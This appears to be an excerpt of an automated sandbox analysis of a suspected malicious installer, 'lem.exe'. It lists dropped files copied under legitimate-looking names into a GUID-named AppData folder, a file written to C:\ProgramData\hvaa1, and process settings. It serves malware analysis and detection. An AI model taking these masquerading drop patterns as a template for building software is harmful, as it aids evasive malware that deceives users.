Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-RRJFN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-7V8Q3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-OMCH5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\xvidcore.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-U7QHJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.Build.Engine.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.DesignTools.Diagnostics.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-CJI5N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\VirtualBoxVM.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.CMake.Project.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-3GPBO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-R4INT.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\lem.exe	File created: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\AdobeXMPFiles.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File created: C:\ProgramData\hvaa1\ieusjw	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\MSSP7ES.DLL (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-EPFSJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\netstandard.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-1JUGA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-IAR95.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-BOMU6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-BE8GU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\trust.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.Workspace.Implementation.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-607DJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-E6S09.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\openssl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\BCSRuntime.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\WzAddrycts64.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\klist.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-2G042.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-MSIO8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.Developer.IdentityService.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\sexp-conv.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-4I031.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\wish.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-PF777.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-UGTIU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\p11-kit.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-V27GE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-TP3J2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.QualityTools.ExecutionCommon.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-2TQSG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-HJD82.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\PresentationBuildTasks.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\wintoast.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.ProgramSynthesis.Transformation.Tree.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\edit_test.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\IEAWSDC.DLL (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-PU8TF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\kvno.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-J4PLL.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\lem.exe	File created: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_008378C0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,		6_2_008378C0
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0086D83A IsWindowVisible,IsIconic,		6_2_0086D83A

Source: C:\Users\user\Desktop\lem.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.TeamFoundation.WorkItemTracking.Controls.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-V97C3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-VDE8M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\System.Data.SQLite.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\gss-server.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-8D7A3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-UGAPQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\git-upload-archive.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-H4CCE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-8NH1K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\WzWXFog64.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-RRJFN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\xvidcore.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-OMCH5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-U7QHJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.Build.Engine.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.DesignTools.Diagnostics.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\VirtualBoxVM.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-CJI5N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.CMake.Project.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-3GPBO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-R4INT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\AdobeXMPFiles.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Dropped PE file which has not been started: C:\ProgramData\hvaa1\ieusjw	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\MSSP7ES.DLL (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\netstandard.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-EPFSJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-IAR95.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-1JUGA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-BE8GU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-BOMU6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\trust.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.Workspace.Implementation.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-E6S09.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-607DJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\openssl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\BCSRuntime.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\WzAddrycts64.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\klist.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-2G042.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-MSIO8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.Developer.IdentityService.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\sexp-conv.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\wish.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-4I031.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-PF777.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-UGTIU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\p11-kit.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_iscrypt.dll	Jump to dropped file
